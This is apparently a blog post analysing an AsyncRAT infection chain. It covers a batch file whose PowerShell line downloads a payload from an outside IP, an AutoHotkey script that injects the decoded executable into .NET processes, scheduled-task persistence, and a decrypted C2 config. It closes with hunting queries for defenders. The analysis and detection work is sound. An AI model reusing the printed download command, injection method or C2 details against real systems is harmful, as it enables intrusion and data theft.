Sandbox Surfing

It’s been a while since I’ve done one of these, but I had some time and thought I’d do quick analysis of whatever random file I found on public submissions of any.run. The file I landed on is named xx.jpg (really a .zip file). This didn’t appear to be the original file in this infection chain, so I needed to pivot in VT and find the execution parent. You can do this by clicking the relations tab and investigating the listed files.

Relations tab of VT The first is ‘police.zip’ which contains ‘sat.bat’. Police.zip is actually a .rar archive. It is unclear where the original .rar file would have been downloaded from, likely via an e-mail attachment.

The archive is presented to the victim user as follows:

rar archive

Assuming the victim user has extracted this archive and executed the script Sat.bat, the first half of the batch file uses powershell to reach out to hXXp://109.199.101[.]109:770/xx.jpg using

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('%url%', '%filePath%')"

which will download a file named x.zip to %UserProfile%\Documents or %UserProfile%\OneDrive\Documents depending on whether or not the user has OneDrive:

  • File name: x.zip
  • MD5: 134af0f2fc2a9cd8976a242b81f8840f
  • SHA256: 0268871620a416498e385020574721680eae7a9d887eb995fc6d3fef61d568d8
  • any.run

Powershell will then extract these contents using the Expand-Archive cmdlet. This will produce the following three files:

  • AutoHotkey64.exe This appears to be the legitimate, standard executable for AutoHotkey. “AutoHotkey is a free, open-source scripting language for Windows that allows users to easily create small to complex scripts for all kinds of tasks such as: form fillers, auto-clicking, macros, etc.”
  • AutoHotkey64.ahk Interestingly, this file has a Family label of 'ahkinjector' in VT and is detected by Microsoft as the same. Looking into this file, we see:

Contents of AutoHotkey64.ahk

Contents of A.txt

AutoHotkey64.exe will execute 3 times within this extracted directory, automatically executing the file AutoHotkey64.ahk (default behaviour of the application on launch) which will in turn inject the contents of A.txt into 5 processes (more on this shortly). The rest of the script (lines 46-80) uses powershell to create persistence via a Scheduled Task named alosh using -ComObject Schedule.Service. This will run every 2 minutes and execute AutoHotkey64.exe.

Scheduled task

Injection

The file A.txt as shown above is an array with a bunch of numbers. To understand how this is used, we need to look at the final 5 lines of AutoHotkey64.ahk, also shown above. These lines execute (using the first as an example):

Execute(getBuffer(ReadFromFile(A_MyDocuments . "\A.txt")), "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe")

If we look at the functions at the beginning of AutoHotkey64.ahk, we see that this is getting the contents of the numbers in the array in A.txt, multiplying them by 2 and rounding up using the Ceil function: bufferArr.Push(Ceil(splitArr[A_Index] * 2)). We see numerous API calls related to injection, the most important being:

  • VirtualAllocEx (allocates memory in a process)
  • WriteProcessMemory (writes data into a region of memory)

This buffer gets injected via those API calls into the specified processes listed:

  • “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe”
  • “C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe”
  • “C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe”
  • “C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe”
  • “C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe”

If we decode the contents of the buffer, we find that this is actually an executable file that is being injected. We can manipulate and decode the charcode using a python script emulating the functions from the .ahk file.

multiply.py - script to emulate the 2 times multiplication and round up using Ceil (note that I hardcoded the array into this script which is not shown below):

array = [1,2,3...]
multiplier = 2

result = list(map(lambda x: math.ceil(x * multiplier), array))
print(result) 

Executing this with python3 multiply.py > chars.txt generates a file with our updated charcode. We can then copy paste the newly decoded array into CyberChef and utilise the From Charcode recipe (base10).

Cyberchef From Charcode

As expected, we see that this is an executable file as denoted by the MZ header — this is the executable that is to be injected into the 5 processes above. We can save this output to a file and do some further analysis.

  • File Name: download.exe (arbitrarily chosen by me)
  • MD5: cff98b7273403f28f5ed9866a9c829f4
  • SHA256: 4ca4705e5c2c9a8fee0bec1197085c882156f4fb764e0c1f15d126213d39c390

This executable file is not located in VT and wasn’t found via a quick Google search or in any.run/malshare; it may exist elsewhere. This doesn’t matter too much as there hasn’t been too much effort to conceal what this file is or does, outside of some function name obfuscation. Opening the file in PEStudio, we see that this is a 32-bit .NET file with a number of suspect functions we may expect from a RAT or keylogger:

PEStudio main page PEStudio functions

Further Static Analysis

Running strings -el -n 10 on this file also shows some interesting results that could give reason to believe this is some type of RAT or stealer, notably the references to browser locations and crypto names. Just the strings output alone hints very strongly at the capability of this malware. The reversed string of nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS is very interesting. Googling this returns many hits to ASyncRAT.

There are many different routes we could take for further analysis here. For a bit of fun, I chose to locate a YARA rule from the Yara-Rules repo on Github and run it against the sample. This produced a positive hit, matching on the following (most of these match on the unencrypted strings we saw earlier, including the reversed registry key string):

YARA hit

The source code for ASyncRAT can be found on Github. The version we are looking at has garbage function names, but most of the code is unencrypted and understandable if we open in DNSpy and take a look. When we do so, we see the file is named 'ASyncClient'.

Opening in DNSpy

The main function:

Screenshot of the Main function Log.tmp file that gets created in %TEMP% when keystrokes are logged:

Log.tmp file

I won’t do a full teardown of all ASyncRAT functionality as there are plenty of other blogs out there on this already and the C# code is available on Github.

Malware Config

However, I did follow a YouTube video from 0xdf on how to decrypt the malware config using CyberChef. Here’s the AES decryption of the C2 server:

C2 found via CyberChef AES decryption

Here’s the certificate: Certificate decrypted via CyberChef

The decrypted malware config is:

Port: 1005
Hosts: samsalah1.freeddns.org
Version: AWS | 3Losh
Mutex: AsyncMutex_alosh
Install: false
Install Folder: %APPDATA%
Pastebin: null
BDOS: false
Delay: 3
Botnet: Default

Googling the C2 turns up some other sandbox reports, notably Triage which actually extracted the config automatically from Sat.bat. We could have also done dynamic analysis, note however that ASyncRAT does have some basic anti-analysis features and checks. This particular sample we analysed appears to have been constructed with the 3Losh crypter.

Prevent / Detect / Hunt

AntiVirus and EDR should provide alerts on these malicious samples, but here are some additional thoughts and prevention/detection/hunt ideas.

  • Alert on the file creation of AutoHotKey64.exe. There should be no legitimate use-case for this scripting language in a corporate environment
  • Consider app control or a similar default deny/zero trust type of product (such as Threatlocker)
  • Monitor outbound traffic on unusual ports
  • Monitor DNS traffic to unusual locations or free DNS services such as freeddns, especially from unusual processes (RegAsm etc)
  • If tools allow (Velociraptor etc), search for the existence of known Mutex format AsyncMutex_*

If using MDE, some hunt ideas:

  • Search for the existence of 1 letter files commonly seen for initial access
DeviceFileEvents
| where Timestamp >=ago(30d)
| where FolderPath contains "Users" or FolderPath has_all(@"C:","Temp") // Can be commented out if necessary
| where FileName matches regex "^[a-zA-Z0-9]{1}[.](exe|dll|js|bat|txt|vbs|ahk|chm|lnk|zip|rar|7z|hta|py|iso|vmdk|ocx)$" // Add as many extensions as you like
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessCommandLine
| limit 1000 // Adjust conditions and remove duplicates if found
  • Search for suspicious Network events using default ASyncRAT ports and known bad port from this sample
DeviceNetworkEvents
| where Timestamp >=ago(30d)
| where RemotePort has_any("6606", "7707", "8808") or RemotePort == "1005" // Default ASyncRAT ports + our malicious port from this sample
| top 1000 by Timestamp

Splunk search to see it all happen within WinEventLog and Sysmon:

index=win Sat.bat OR x.zip OR 1005 OR freeddns
| eval CommandLine=if(EventCode=4104, ScriptBlockText, CommandLine) 
| eval CommandLine=if(EventCode=4103, Payload, CommandLine)
| eval CommandLine=if(EventCode=5156, DestAddress + ":" + DestPort, CommandLine)
| eval CommandLine=if(EventCode=13, registry_value_name, CommandLine)
| eval CommandLine=if(EventCode=11, TargetFilename, CommandLine)
| eval CommandLine=if(EventCode=22, QueryName, CommandLine)
| table _time, host, EventCode, signature, CommandLine, Image, ProcessID

Splunk search with Windows Event Log + Sysmon Page 2

RG